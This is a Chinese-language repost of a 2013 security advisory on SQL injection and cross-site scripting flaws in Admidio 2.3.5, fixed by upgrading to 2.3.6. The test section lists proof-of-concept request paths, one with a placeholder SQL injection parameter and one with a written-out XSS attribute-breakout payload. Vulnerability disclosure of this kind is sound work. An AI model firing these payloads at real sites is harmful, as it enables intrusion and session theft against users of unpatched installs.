• 选择风格
  • 加入收藏
  • 繁體中文
  • 网站地图
    • 当前位置:首页 >> 网络通讯 >> 网络安全 >> 内容

    Admidio 2.3.5多个缺陷及修复

    时间:2013/4/19 12:09:00 作者:平凡之路 来源:xuhantao.com 浏览:

    标题 Admidio 2.3.5 Multiple security vulnerabilities 
     
    作者     Stefan Schurtz 
     
    影响软件:  Successfully tested on Admidio 2.3.5 
     
    开发者官网:      

    状态:已修复
     
      
     
    缺陷概述
      
    Admidio 2.3.5 含 XSS 及 SQLi缺陷
     
    ================== 
    测试
     
      
     
    //SQLi 
     
      
     
    /admidio-2.3.5/adm_program/modules/lists/lists.php?active_role=[sql-injection] 
     
      
     
    //XSS 
     
      
     
    /admidio-2.3.5/adm_program/modules/guestbook/guestbook_new.php?headline=" onmouseover=alert(/xss/) " 
     
      
    解决方案
     
    升级到最新版 2.3.6 
     
      ,涛涛电脑知识网,涛涛电脑知识网

  • 上一篇:利用后台SQL查询语句拿webshell
  • 下一篇:vBulletin Yet Another Awards System 4.0.2 SQL注射
    • 相关文章
    • 没有相关文章
    共有评论 0相关评论
    发表我的评论
    • 大名:
    • 内容:
  • 徐汉涛(www.xuhantao.com) © 2024 版权所有 All Rights Reserved.
  • 部分内容来自网络,如有侵权请联系站长尽快处理 站长QQ:965898558(广告及站内业务受理) 网站备案号:蒙ICP备15000590号-1